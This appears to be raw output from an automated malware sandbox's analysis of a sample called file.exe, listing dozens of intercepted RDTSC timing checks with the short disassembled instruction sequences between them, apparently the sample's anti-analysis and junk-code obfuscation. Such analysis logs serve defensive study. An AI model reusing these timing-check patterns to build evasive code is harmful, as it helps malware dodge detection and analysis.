Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BF29C second address: 6BF2A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E8B2A second address: 6E8B34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E8B34 second address: 6E8B39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E8B39 second address: 6E8B46 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBF78ADB278h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E8CA4 second address: 6E8CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E8CAA second address: 6E8CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E8CAE second address: 6E8CB4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E8CB4 second address: 6E8CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E8CBA second address: 6E8CC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FBF78E7B356h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E8CC5 second address: 6E8CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FBF78ADB276h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E8CD7 second address: 6E8CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E8CDB second address: 6E8CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FBF78ADB276h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FBF78ADB27Eh 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E8CFA second address: 6E8D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E8D05 second address: 6E8D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E8ED0 second address: 6E8EE4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBF78E7B35Eh 0x00000008 jnc 00007FBF78E7B356h 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E8EE4 second address: 6E8F0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FBF78ADB276h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FBF78ADB284h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E8F0C second address: 6E8F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FBF78E7B362h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E905F second address: 6E9069 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBF78ADB282h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E9069 second address: 6E907F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBF78E7B356h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007FBF78E7B377h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EDC4F second address: 6EDC63 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBF78ADB276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FBF78ADB27Eh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EDF57 second address: 6EDF8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 je 00007FBF78E7B356h 0x0000000e jmp 00007FBF78E7B361h 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FBF78E7B361h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EE510 second address: 6EE516 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F02FD second address: 6F0302 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F0302 second address: 6F0346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FBF78ADB281h 0x0000000b push esi 0x0000000c pop esi 0x0000000d ja 00007FBF78ADB276h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007FBF78ADB27Ch 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007FBF78ADB27Ah 0x00000025 jns 00007FBF78ADB276h 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F3FF7 second address: 6F4021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78E7B362h 0x00000009 popad 0x0000000a je 00007FBF78E7B358h 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jg 00007FBF78E7B356h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E4A1 second address: 66E4BC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FBF78ADB285h 0x0000000c jmp 00007FBF78ADB27Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FBF11 second address: 6FBF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FBF78E7B356h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FAE6A second address: 6FAE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FAE73 second address: 6FAE8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B35Eh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FB54D second address: 6FB551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FB551 second address: 6FB559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB559 second address: 6FB565 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBF78ADB27Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB808 second address: 6FB80E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB80E second address: 6FB82A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB281h 0x00000007 pushad 0x00000008 jnp 00007FBF78ADB276h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB82A second address: 6FB830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA6FF second address: 6FA70E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBF78ADB276h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA70E second address: 6FA714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA714 second address: 6FA738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBF78ADB289h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA738 second address: 6FA75B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B364h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FBF78E7B35Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FEE40 second address: 6FEE4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBF78ADB276h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 704300 second address: 70430E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jc 00007FBF78E7B356h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709613 second address: 70965F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78ADB286h 0x00000009 jmp 00007FBF78ADB289h 0x0000000e popad 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FBF78ADB285h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70965F second address: 709665 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709665 second address: 709669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709669 second address: 709678 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FBF78E7B356h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CB03 second address: 70CB09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CB09 second address: 70CB28 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007FBF78E7B365h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CB28 second address: 70CB2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70C2AF second address: 70C2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FBF78E7B356h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70C2B9 second address: 70C2C7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FBF78ADB278h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70C591 second address: 70C5A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBF78E7B35Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710892 second address: 71089C instructions: 0x00000000 rdtsc 0x00000002 js 00007FBF78ADB27Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710B2A second address: 710B63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B367h 0x00000007 push edi 0x00000008 jmp 00007FBF78E7B363h 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jc 00007FBF78E7B364h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710E44 second address: 710E4A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710E4A second address: 710E5F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF78E7B35Eh 0x00000008 jnl 00007FBF78E7B356h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEBE7 second address: 6BEBEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEBEC second address: 6BEC73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D2993h], ecx 0x00000012 mov ebx, dword ptr [ebp+1248FB40h] 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007FBF78E7B358h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 mov edi, 697BB19Dh 0x00000037 and ecx, 5339D560h 0x0000003d add eax, ebx 0x0000003f mov dword ptr [ebp+1245861Fh], ecx 0x00000045 push eax 0x00000046 jnc 00007FBF78E7B368h 0x0000004c mov dword ptr [esp], eax 0x0000004f push ebx 0x00000050 jmp 00007FBF78E7B35Ch 0x00000055 pop ecx 0x00000056 push 00000004h 0x00000058 sub edi, 20C59E2Dh 0x0000005e nop 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 push edi 0x00000064 pop edi 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEC73 second address: 6BEC8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB287h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEC8E second address: 6BEC94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEC94 second address: 6BECBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB27Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBF78ADB285h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BECBD second address: 6BECD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF78E7B366h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BECD7 second address: 6BECDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716D4B second address: 716D69 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FBF78E7B368h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716EE3 second address: 716EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716EE8 second address: 716EF2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF78E7B35Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716EF2 second address: 716F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 jmp 00007FBF78ADB286h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7174AE second address: 7174C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78E7B360h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7174C7 second address: 7174E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB288h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7182A7 second address: 7182AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7182AB second address: 7182B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7182B1 second address: 7182E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B364h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBF78E7B368h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7182E3 second address: 7182E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7182E7 second address: 7182F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7182F5 second address: 718307 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF78ADB276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FBF78ADB278h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 718307 second address: 718325 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBF78E7B366h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 718325 second address: 718329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 718329 second address: 718333 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBF78E7B356h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7212C4 second address: 7212D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jno 00007FBF78ADB278h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7212D5 second address: 7212D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7212D9 second address: 7212DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72071E second address: 72072B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FBF78E7B356h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720884 second address: 720889 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720889 second address: 7208B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78E7B35Ch 0x00000009 jmp 00007FBF78E7B369h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7208B9 second address: 7208BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7208BD second address: 7208CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720B79 second address: 720B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720B81 second address: 720B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720D17 second address: 720D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBF78ADB289h 0x0000000c jmp 00007FBF78ADB284h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720D4B second address: 720D59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B35Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 729199 second address: 72919E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72919E second address: 7291B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78E7B35Eh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7291B5 second address: 7291B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72789D second address: 7278A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727A01 second address: 727A05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727B86 second address: 727B8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727B8D second address: 727B93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727B93 second address: 727B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
